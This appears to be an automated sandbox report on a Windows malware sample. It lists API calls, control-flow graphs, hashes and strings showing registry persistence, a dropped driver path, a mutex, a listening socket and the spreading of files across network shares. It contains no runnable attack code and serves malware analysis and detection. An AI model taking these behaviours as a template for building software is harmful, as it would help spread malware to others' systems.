                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 008F83EA
                                                                                                            • htons.WS2_32(00000E9D), ref: 008F840B
                                                                                                            • bind.WS2_32(000000FF,00000002,00000010), ref: 008F842C
                                                                                                            • closesocket.WS2_32(00000000), ref: 008F84A3
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F84AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3582385377-0
                                                                                                            • Opcode ID: 021e8e8f83e1a13f489bd15e1f0ec72e475eee01810d0eb10172448bb08ef3cb
                                                                                                            • Instruction ID: 50214f005c36ed1edbdb5ee49cd55559d188f19495b42eff654720877ee0d994
                                                                                                            • Opcode Fuzzy Hash: 021e8e8f83e1a13f489bd15e1f0ec72e475eee01810d0eb10172448bb08ef3cb
                                                                                                            • Instruction Fuzzy Hash: 3331FA74A0030EEADB209FF49D0DBBEB774FF14715F20461AA715E62D0DA744640DB99
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00987C02
                                                                                                            • GetProcAddress.KERNEL32(?,00984FF9), ref: 00987C20
                                                                                                            • ExitProcess.KERNEL32(?,00984FF9), ref: 00987C31
                                                                                                            • VirtualProtect.KERNEL32(008D0000,00001000,00000004,?,00000000), ref: 00987C7F
                                                                                                            • VirtualProtect.KERNEL32(008D0000,00001000), ref: 00987C94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1996367037-0
                                                                                                            • Opcode ID: b180505da8a0b05270ef15eea99eae92daf9fe259a48dd76382812d5722befce
                                                                                                            • Instruction ID: f4fc1837f583cc078622b1884a1b5e9fc0764162e1f0e4856e235d0e3abd2d6a
                                                                                                            • Opcode Fuzzy Hash: b180505da8a0b05270ef15eea99eae92daf9fe259a48dd76382812d5722befce
                                                                                                            • Instruction Fuzzy Hash: 1651E4726583124BD720BEF89CC06A4FBA9EB513247380B79C6E6C73C5E7A4D8068764

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 814 40371b-40372c 815 403741-403755 814->815 816 40372e-403764 814->816 817 4037dc-40384a LoadLibraryExA call 403976 call 40397b SetErrorMode CreateFileMappingA * 2 815->817 820 403774-40377d 816->820 821 403766-403772 816->821 831 403886-4038a6 CreateThread 817->831 832 40384c-403860 MapViewOfFile 817->832 823 40377e-403783 820->823 821->823 825 403785 823->825 826 40378a-403795 823->826 828 4038d0-4038d7 825->828 829 403797 826->829 830 40379c-4037d6 call 40399c call 403976 call 40399c call 403976 826->830 834 403969-403971 828->834 835 4038dd-4038f3 GetModuleFileNameA 828->835 829->828 830->817 838 4038ac-4038b3 831->838 832->831 836 403862-40386f 832->836 834->828 839 4038f5-403920 LoadLibraryExA GetProcAddress 835->839 840 403956-40395b Sleep 835->840 836->831 843 403871-403882 836->843 845 4038b5-4038bd 838->845 846 4038bf-4038ce Sleep 838->846 839->840 847 403922-403954 CreateMutexA GetLastError 839->847 841 403961-403963 ExitProcess 840->841 843->831 848 403884 843->848 845->838 846->828 846->838 847->840 847->841 848->831
                                                                                                            APIs
                                                                                                            • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 004037E7
                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0040380E
                                                                                                            • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 00403828
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 00403842
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 00403858
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00403DA9), ref: 004038A6
                                                                                                            • Sleep.KERNEL32(0000000C), ref: 004038C1
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHxJqGoGFB.exe,000001FE), ref: 004038EB
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0040390A
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00403918
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00403945
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0040394C
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0040395B
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00403963
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile$ErrorLibraryLoadMappingSleep$AddressExitLastModeModuleMutexNameProcProcessThreadView
                                                                                                            • String ID: """"$3333$Ap1mutx7$C:\Users\user\Desktop\RHxJqGoGFB.exe$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 3272623439-3078967841
                                                                                                            • Opcode ID: 488a5f742d6fa30908eadc79c6102163c7347a3a0603545248698a45355f84f8
                                                                                                            • Instruction ID: 33b87eccd636c6f659f4b5a06f682442ebdd106e99f0b365c98b3f3dd3420834
                                                                                                            • Opcode Fuzzy Hash: 488a5f742d6fa30908eadc79c6102163c7347a3a0603545248698a45355f84f8
                                                                                                            • Instruction Fuzzy Hash: 8C6160B1640289ABEF10DF60CD49FAA3B6CAF04706F544526FE09BE1E0D6B597448B1E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 877 8f4d96-8f4e3a call 908060 880 8f4e3c 877->880 881 8f4e41-8f4eb1 lstrcpy lstrlen wsprintfA RegOpenKeyExA 877->881 882 8f5459-8f5469 880->882 883 8f4eb7-8f4ed2 RegCreateKeyA 881->883 884 8f5112-8f5134 881->884 885 8f4ed4-8f4edb 883->885 886 8f4ee0-8f4f04 GlobalAlloc call 8fc89a 883->886 889 8f529e-8f52a5 884->889 890 8f513a-8f5163 wsprintfA 884->890 885->882 899 8f4f1d-8f4f24 886->899 900 8f4f06-8f4f15 call 8f6330 886->900 891 8f52ab-8f5408 call 90772b * 5 call 8f6330 889->891 892 8f542a-8f5431 889->892 894 8f5165-8f5197 RegQueryValueExA 890->894 895 8f51a0-8f51d9 RegQueryValueExA 890->895 958 8f540a-8f5423 call 90772b 891->958 959 8f5425 891->959 897 8f5433-8f543a RegCloseKey 892->897 898 8f5440-8f5447 892->898 901 8f519e 894->901 902 8f5199 894->902 903 8f51db 895->903 904 8f51e0-8f5202 895->904 897->898 898->882 909 8f4f2a-8f4f4c 899->909 910 8f50f0-8f50f7 899->910 921 8f4f1a 900->921 901->904 903->904 905 8f5299 904->905 906 8f5208-8f520e 904->906 905->889 911 8f523f-8f524d 906->911 912 8f524f-8f525b 906->912 913 8f525d-8f527a call 8f49f9 906->913 914 8f527c-8f5296 call 8f49f9 906->914 915 8f5215-8f5221 906->915 916 8f5223-8f522f 906->916 917 8f5231-8f523d 906->917 926 8f5085-8f50ed RegCloseKey call 90772b * 2 909->926 927 8f4f52-8f4f96 wsprintfA 909->927 919 8f50f9-8f5100 GlobalFree 910->919 920 8f5106-8f510d 910->920 911->905 912->905 913->905 914->905 915->905 916->905 917->905 919->920 920->882 921->899 926->910 932 8f4f9c-8f4fa2 927->932 933 8f5027-8f502e 927->933 932->911 932->912 932->913 932->914 932->915 932->916 932->917 934 8f4fcd-8f4fd7 932->934 935 8f4fa9-8f4fb3 932->935 936 8f5007-8f5021 call 8f4a5b lstrcpy 932->936 937 8f4fe5-8f5005 call 8f4a5b lstrcpy 932->937 938 8f4fc1-8f4fcb 932->938 939 8f4fd9-8f4fe3 932->939 940 8f4fb5-8f4fbf 932->940 941 8f5053-8f507a lstrlen RegSetValueExA 933->941 942 8f5030-8f5051 RegSetValueExA 933->942 934->933 935->933 936->933 937->933 938->933 939->933 940->933 949 8f5080 941->949 942->949 958->892 959->892
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F4E54
                                                                                                            • lstrlen.KERNEL32(00000000,\%d,656E6F6A), ref: 008F4E78
                                                                                                            • wsprintfA.USER32 ref: 008F4E86
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 008F4EA9
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 008F4ECA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                            • String ID: Software\Msoga$\%d$joneC:\Windows\
                                                                                                            • API String ID: 4004410694-4125127941
                                                                                                            • Opcode ID: 18be3a0ac58c1eb4a5524539b84da1861c051f77df8d1f797457398cfec10e04
                                                                                                            • Instruction ID: f74509515487c08cc7999c2e1c4c592c2203e6c03d79388618cc1889a6ec9462
                                                                                                            • Opcode Fuzzy Hash: 18be3a0ac58c1eb4a5524539b84da1861c051f77df8d1f797457398cfec10e04
                                                                                                            • Instruction Fuzzy Hash: 6E026EB590161CEBDB20DF64CC85BE9B779FB58304F0842D9E619A7281DB729B84CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 962 90195d-901a24 Sleep WNetOpenEnumA 963 901a42-901a57 GlobalAlloc 962->963 964 901a26-901a3d 962->964 966 901a5a-901a61 963->966 965 901cd2-901ce2 964->965 967 901a67-901a9f call 8f4060 WNetEnumResourceA 966->967 968 901c9d-901cbb GlobalFree WNetCloseEnum 966->968 972 901aa5-901ac9 967->972 973 901c7e-901c89 GetLastError 967->973 969 901ccd 968->969 969->965 977 901c7c 972->977 978 901acf-901ae0 972->978 975 901c8b 973->975 976 901c8d-901c98 Sleep 973->976 975->968 976->966 977->976 979 901ae6-901af7 978->979 980 901c77 978->980 979->980 981 901afd-901b0e 979->981 982 901c51-901c71 call 90195d Sleep 981->982 983 901b14-901b42 lstrcpy lstrcat call 900b9a 981->983 982->980 986 901b47-901b4c 983->986 986->982 988 901b52-901b65 986->988 989 901bf1-901bfa 988->989 990 901b6b-901b94 lstrcpy lstrlen 988->990 991 901c3b-901c42 989->991 992 901bfc-901c38 call 8f4060 lstrlen call 901060 989->992 993 901b96-901ba2 lstrcat 990->993 994 901ba8-901be8 lstrlen call 8fa16b lstrcat call 900c4b 990->994 991->982 996 901c44-901c4b DeleteFileA 991->996 992->991 993->994 994->989 1004 901bea 994->1004 996->982 1004->989
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000400), ref: 009019FA
                                                                                                            • WNetOpenEnumA.MPR(00000002,00000000,00000000,00909078,?), ref: 00901A11
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 00901A51
                                                                                                            • WNetEnumResourceA.MPR(?,?,?,?), ref: 00901A92
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00901B29
                                                                                                            • lstrcat.KERNEL32(?,008F3D50), ref: 00901B38
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 00901B76
                                                                                                            • lstrlen.KERNEL32(?), ref: 00901B83
                                                                                                            • lstrcat.KERNEL32(?,008F3D54), ref: 00901BA2
                                                                                                            • lstrlen.KERNEL32(?), ref: 00901BAF
                                                                                                            • lstrcat.KERNEL32(?,.tmp), ref: 00901BD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
                                                                                                            • String ID: .tmp
                                                                                                            • API String ID: 2671286937-2986845003
                                                                                                            • Opcode ID: b39e986a2e2ff3c81773ef74f0c6225223c3e51338da550391759fe375359247
                                                                                                            • Instruction ID: b4ecaca4a21e7c4533e07bcfa9dd369c30c63b81ed6450e0be4a7eca8d5480fd
                                                                                                            • Opcode Fuzzy Hash: b39e986a2e2ff3c81773ef74f0c6225223c3e51338da550391759fe375359247
                                                                                                            • Instruction Fuzzy Hash: E4919071900628EFDF20DF64DC88BAB77B9BF44302F008699E619A72D0D7769A85CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1030 8f9eea-8f9ef7 1031 8f9ef9-8f9f04 Sleep 1030->1031 1032 8f9f06-8f9f0b Sleep 1030->1032 1033 8f9f11-8f9f3e call 8f8f51 * 2 1031->1033 1032->1033 1037 8f9f43-8f9f5a LoadLibraryA 1033->1037 1038 8fa149-8fa168 RtlExitUserThread 1037->1038 1039 8f9f60-8f9f7c GetProcAddress 1037->1039 1041 8f9f7e 1039->1041 1042 8f9f83-8f9fa0 GetProcAddress 1039->1042 1043 8f9fa7-8f9fc4 GetProcAddress 1042->1043 1044 8f9fa2 1042->1044 1045 8f9fcb-8f9fe7 GetProcAddress 1043->1045 1046 8f9fc6 1043->1046 1047 8f9fee-8fa00b GetProcAddress 1045->1047 1048 8f9fe9 1045->1048 1049 8fa00d 1047->1049 1050 8fa012-8fa02f GetProcAddress 1047->1050 1051 8fa036-8fa052 GetProcAddress 1050->1051 1052 8fa031 1050->1052 1053 8fa059-8fa076 GetProcAddress 1051->1053 1054 8fa054 1051->1054 1055 8fa07d-8fa0ba call 8f92f3 CreateThread call 8f41c6 LoadLibraryA 1053->1055 1056 8fa078-8fa155 1053->1056 1055->1038 1062 8fa0c0-8fa0dc GetProcAddress 1055->1062 1056->1038 1062->1038 1063 8fa0de-8fa0e5 call 8f917d 1062->1063 1066 8fa0e7-8fa110 call 8f45d2 call 8f9243 1063->1066 1067 8fa113-8fa11a call 8f917d 1063->1067 1066->1067 1067->1038 1073 8fa11c-8fa123 call 8f9706 1067->1073 1073->1038 1077 8fa125-8fa146 CreateThread call 8f41c6 1073->1077 1077->1038
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 008F9EFE
                                                                                                            • Sleep.KERNEL32(00001000), ref: 008F9F0B
                                                                                                            • LoadLibraryA.KERNEL32(008F27C0), ref: 008F9F4D
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F27D0), ref: 008F9F6A
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F27E0), ref: 008F9F8E
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F27F0), ref: 008F9FB2
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008FA14B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                                                                                            • String ID: C:\Windows\system32\drivers\lrohpn.sys
                                                                                                            • API String ID: 3711489173-4176201111
                                                                                                            • Opcode ID: c3821d58994713df52831b83d85a1fd9c1375425493c8e4bb381c56db1c531ea
                                                                                                            • Instruction ID: 590dcbcf7aa94452df0cfea36c4b4d58ef7bb6aef2efbda6ccbed55a685086fa
                                                                                                            • Opcode Fuzzy Hash: c3821d58994713df52831b83d85a1fd9c1375425493c8e4bb381c56db1c531ea
                                                                                                            • Instruction Fuzzy Hash: 786180B5A15208FFEB14EBB4EC4DB6A33B8FB18711F104216E70AD22A1DB755984DB12

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1080 90392d-903967 call 908060 1083 903968-90396f 1080->1083 1084 903971-90397c Sleep 1083->1084 1085 90397e-9039b5 lstrcpy LoadLibraryA 1083->1085 1084->1083 1086 9039b7-9039ca GetProcAddress 1085->1086 1087 9039cf-9039d6 1085->1087 1086->1087 1088 9039d8-903a12 FreeLibrary lstrcat LoadLibraryA 1087->1088 1089 903a2c-903a94 call 90377a CreateThread call 8f41c6 CreateThread call 8f41c6 Sleep 1087->1089 1088->1089 1090 903a14-903a27 GetProcAddress 1088->1090 1097 903ab0-903ab7 1089->1097 1090->1089 1098 903ae7-903b0c Sleep call 90174a * 2 1097->1098 1099 903ab9-903ae5 Sleep CreateThread call 8f41c6 1097->1099 1107 903b19-903b20 1098->1107 1099->1097 1108 903b22-903b29 1107->1108 1109 903b5e Sleep 1107->1109 1108->1109 1111 903b2b-903b32 1108->1111 1109->1107 1111->1109 1112 903b34-903b56 call 8f4060 call 90195d 1111->1112 1116 903b5b 1112->1116 1116->1109
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001000), ref: 00903976
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2714), ref: 0090398B
                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 009039A2
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F2700), ref: 009039C4
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 009039DF
                                                                                                            • lstrcat.KERNEL32(00000000,008F22B0), ref: 009039F2
                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 009039FF
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F2700), ref: 00903A21
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00903062,00000000,00000000,00000000), ref: 00903A49
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00031E9B,00000000,00000000,?), ref: 00903A70
                                                                                                            • Sleep.KERNEL32(00000400), ref: 00903A84
                                                                                                            • Sleep.KERNEL32(00000400), ref: 00903AAA
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00031CE3,0000005A,00000000,?), ref: 00903AD6
                                                                                                            • Sleep.KERNEL32(00000400), ref: 00903AEC
                                                                                                            • Sleep.KERNEL32(000DBBA0), ref: 00903B13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                                                                                            • String ID: Z
                                                                                                            • API String ID: 4104366077-1505515367
                                                                                                            • Opcode ID: ea8b1e013df518d86dae7678b9a1fa907fa0ac802826bbfcd4515a6dee0531ce
                                                                                                            • Instruction ID: 9e6160d9d2fed33ff964f267f937c2ebbeda956e3e8afd62adc6a116103d25ad
                                                                                                            • Opcode Fuzzy Hash: ea8b1e013df518d86dae7678b9a1fa907fa0ac802826bbfcd4515a6dee0531ce
                                                                                                            • Instruction Fuzzy Hash: F7519175A40244EFEB21AB60EC09BE97778FB48702F008696F349A61D0C7F45AC4CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1117 8f4af0-8f4b59 call 908060 1120 8f4b5b 1117->1120 1121 8f4b60-8f4bc9 lstrcpy lstrlen wsprintfA RegOpenKeyExA 1117->1121 1122 8f4d75-8f4d79 1120->1122 1123 8f4bed-8f4c0f 1121->1123 1124 8f4bcb-8f4be6 RegCreateKeyA 1121->1124 1127 8f4d68-8f4d6f RegCloseKey 1123->1127 1128 8f4c15-8f4c5a wsprintfA 1123->1128 1124->1123 1125 8f4be8 1124->1125 1125->1122 1127->1122 1129 8f4d0a-8f4d11 1128->1129 1130 8f4c60-8f4c66 1128->1130 1131 8f4d36-8f4d5d lstrlen RegSetValueExA 1129->1131 1132 8f4d13-8f4d34 RegSetValueExA 1129->1132 1133 8f4cae-8f4cba 1130->1133 1134 8f4c6d-8f4c78 1130->1134 1135 8f4c7d-8f4c8b 1130->1135 1136 8f4c8d-8f4c9b 1130->1136 1137 8f4c9d-8f4cac 1130->1137 1138 8f4cbc-8f4ce3 call 8f4a5b lstrcpy 1130->1138 1139 8f4ce5-8f4d04 call 8f4a5b lstrcpy 1130->1139 1142 8f4d63 1131->1142 1132->1142 1133->1129 1134->1129 1135->1129 1136->1129 1137->1129 1138->1129 1139->1129
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F4B6C
                                                                                                            • lstrlen.KERNEL32(00000000,\%d,656E6F6A), ref: 008F4B90
                                                                                                            • wsprintfA.USER32 ref: 008F4B9E
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 008F4BC1
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 008F4BDE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                            • String ID: Software\Msoga$\%d$joneC:\Windows\
                                                                                                            • API String ID: 4004410694-4125127941
                                                                                                            • Opcode ID: 6131d4043fd67a17cfe172288427bf4a92312239efa0eabab191996f6b6e9a02
                                                                                                            • Instruction ID: b4fb7eaad41a111781d096f8a33fd9ac32d8007b08b9ee199f9b482bd945406e
                                                                                                            • Opcode Fuzzy Hash: 6131d4043fd67a17cfe172288427bf4a92312239efa0eabab191996f6b6e9a02
                                                                                                            • Instruction Fuzzy Hash: B1616B7590421CAFDB28DF64CC59BEAB778FB58705F1081DAE309A6241D7B09AC4CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1145 8f6330-8f63d7 call 908060 RtlEnterCriticalSection 1148 8f63dd-8f6410 call 90772b 1145->1148 1149 8f672a-8f672e 1145->1149 1156 8f6417-8f645f 1148->1156 1157 8f6412 1148->1157 1151 8f695b-8f6980 RtlLeaveCriticalSection 1149->1151 1152 8f6734-8f6749 IsBadWritePtr 1149->1152 1152->1151 1155 8f674f-8f6758 1152->1155 1155->1151 1158 8f675e-8f6767 1155->1158 1160 8f6466-8f6494 call 90772b 1156->1160 1161 8f6461 1156->1161 1158->1151 1159 8f676d-8f6788 call 8f4145 1158->1159 1159->1151 1168 8f678e-8f67f8 wsprintfA lstrlen call 8f42ec call 8f43c5 1159->1168 1166 8f64c7 1160->1166 1167 8f6496-8f64a5 1160->1167 1167->1166 1169 8f64a7-8f64b4 1167->1169 1168->1151 1180 8f67fe-8f680d 1168->1180 1169->1166 1171 8f64b6-8f64c5 1169->1171 1171->1166 1173 8f64cc-8f64db 1171->1173 1175 8f64dd 1173->1175 1176 8f64e2-8f64ef 1173->1176 1178 8f6507-8f65a6 call 90772b * 4 call 8f47bb 1176->1178 1179 8f64f1-8f6500 1176->1179 1204 8f65ad-8f65b7 1178->1204 1205 8f65a8 1178->1205 1179->1178 1181 8f6502 1179->1181 1180->1151 1182 8f6813-8f681d 1180->1182 1182->1151 1184 8f6823-8f684a call 8f47bb 1182->1184 1184->1151 1190 8f6850-8f6866 1184->1190 1192 8f6868-8f686f GlobalFree 1190->1192 1193 8f6875-8f68b1 GlobalAlloc call 90772b 1190->1193 1192->1193 1199 8f68bf-8f6958 GlobalAlloc wsprintfA lstrlen call 8f42ec call 8f43c5 call 90772b call 8f54a2 1193->1199 1200 8f68b3-8f68b9 GlobalFree 1193->1200 1199->1151 1200->1199 1207 8f65c8-8f65da 1204->1207 1210 8f6698-8f669f 1207->1210 1211 8f65e0-8f65ec 1207->1211 1212 8f66a6-8f671d call 90772b * 2 call 8f4af0 1210->1212 1213 8f66a1-8f696e 1210->1213 1215 8f65fd-8f660e 1211->1215 1235 8f6722-8f6725 1212->1235 1213->1151 1219 8f6623-8f6657 lstrcpy 1215->1219 1220 8f6610-8f661f 1215->1220 1224 8f6659-8f6663 1219->1224 1225 